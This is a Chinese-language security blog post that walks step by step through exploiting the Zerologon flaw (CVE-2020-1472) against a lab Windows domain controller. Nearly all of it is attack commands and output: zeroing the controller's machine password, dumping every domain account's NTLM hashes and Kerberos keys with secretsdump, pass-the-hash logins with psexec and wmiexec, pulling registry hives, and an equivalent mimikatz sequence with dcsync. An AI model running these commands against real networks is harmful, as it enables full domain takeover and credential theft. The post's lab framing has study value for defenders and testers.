Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

CVE-2020-1472 域内提权

内网渗透 Adminxe 46℃ 0评论

0x00 测试环境

DC(WIN-ENS2VR5TR3N):192.168.183.130

攻击机器:192.168.183.129

0x01 对域控进行测试漏洞是否存在

python3 zerologon_tester.py WIN-ENS2VR5TR3N 192.168.183.130

0x02 使用zerologon工具将域控密码打成空

(这里打空的用户是域控所在机器的账户,并不是域控账户。)
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR 
python3 cve-2020-1472-exploit.py WIN-ENS2VR5TR3N 192.168.183.130

0x03 使用空密码dump域控上的hash

secretsdump.py demo.com/WIN-ENS2VR5TR3N\$@192.168.183.130 -no-pass
root@kali:~/Desktop/CVE-2020-1472# secretsdump.py demo.com/WIN-ENS2VR5TR3N\$@192.168.183.130 -no-pass Impacket v0.9.22.dev1+20201015.130615.81eec85a - Copyright 2020 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4800df4eb005a1161099670790d28491::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7c4ed692473d4b4344c3ba01c5e6cb63::: demo.com\douser:1103:aad3b435b51404eeaad3b435b51404ee:bc23b0b4d5bf5ff42bc61fb62e13886e::: WIN-ENS2VR5TR3N$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:c7854335848aff843232d959b46b9dd203e64527f5c78080fe50f7a0da9262da Administrator:aes128-cts-hmac-sha1-96:1ced2c65092c6c7f806f7084936e7c5a Administrator:des-cbc-md5:86766875f22316c1 Administrator:rc4_hmac:4800df4eb005a1161099670790d28491 krbtgt:aes256-cts-hmac-sha1-96:7908334cad9f9da66226206650d640bfdce5633d91827f71bb2f9520cccc021d krbtgt:aes128-cts-hmac-sha1-96:4e43ee83d4f67ba26df9766e1d247a37 krbtgt:des-cbc-md5:8afbf7b6fb68d6c7 krbtgt:rc4_hmac:7c4ed692473d4b4344c3ba01c5e6cb63 demo.com\douser:aes256-cts-hmac-sha1-96:4da088c02bff380e5c4a2730b202f437625edafe74782e228ebfb17d4c7a638f demo.com\douser:aes128-cts-hmac-sha1-96:6a909313c29211aeb7956574036d9202 demo.com\douser:des-cbc-md5:eaa86b2a941519bc demo.com\douser:rc4_hmac:bc23b0b4d5bf5ff42bc61fb62e13886e WIN-ENS2VR5TR3N$:aes256-cts-hmac-sha1-96:dbc729021563cedbdee3a58e1c5957eb32d3fd0617da00e13b650b0c17211047 WIN-ENS2VR5TR3N$:aes128-cts-hmac-sha1-96:fbdc490e057da628beec751bd20eb9e7 WIN-ENS2VR5TR3N$:des-cbc-md5:13c783abbfe32062 WIN-ENS2VR5TR3N$:rc4_hmac:31d6cfe0d16ae931b73c59d7e0c089c0 [*] Cleaning up...

0x04 使用PTH登录域控

psexec.py demo.com/administrator@192.168.183.130 -hashes :获取的administrator中hash值 wmiexec.py demo.com/administrator@192.168.183.130 -hashes :获取的administrator中hash值 wmiexec.py demo.com/administrator@192.168.183.130 -hashes :4800df4eb005a1161099670790d28491

0x05 获取计算机账号原始hash,并保存到本地,同时删除download到域控机器的文件

reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save get system.save get sam.save get security.save del /f system.save del /f sam.save del /f security.save

0x06 使用secretsdump进行机器密码以及域控hash的读取

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

0x07 将该原始计算机帐户哈希还原

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH 
python3 reinstall_original_pw.py WIN-ENS2VR5TR3N 192.168.183.130 200a59f02cec2eb723e509669089481c

0x08 使用空密码重新进行dump测试,失败则为密码恢复成功

python3 secretsdump.py demo.com/WIN-ENS2VR5TR3N\$@192.168.183.130 -no-pass

0x09 Zerologon

https://www.secura.com/pathtoimg.php?id=2055

==================================================================
使用mimikatz.exe去攻击域控
检测目标机是否存在cve2020-1472

lsadump::zerologon /target:域控IP /account:域控主机名$ 
lsadump::zerologon /target:192.168.223.133 /account:win08$

清空域控密码

lsadump::zerologon /target:域控IP /account:域控主机名$ /exploit 
lsadump::zerologon /target:192.168.223.133 /account:win08$ /exploit

获取目标机的HASH

lsadump::dcsync /domain:de1ay.com /dc:dc.de1ay.com /user:krbtgt /authuser:dc$ /authdomain:de1ay.com /authpassword:"" /authntlm 
注意:本地测试需要将DNS指向域控 
lsadump::dcsync /domain:test.com /win08:win08.test.com /user:administrator /authuser:win08$ /authdomain:test

恢复密码

lsadump::postzerologon /target:dc.de1ay.com /account:dc$ 
lsadump::postzerologon /target:192.168.223.133 /account:win08$

注:mimikatz在读取域内HASH的时候需要配置DNS 指向域控 /dc: win08.test.com 这里填写域控的完整的名字 ; 输入参数都正确的情况还获取不了, 重启AD服务 在恢复密码的时候注意先去运行privilege::debug

转载请注明:Adminxe's Blog » CVE-2020-1472 域内提权

喜欢 (1)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址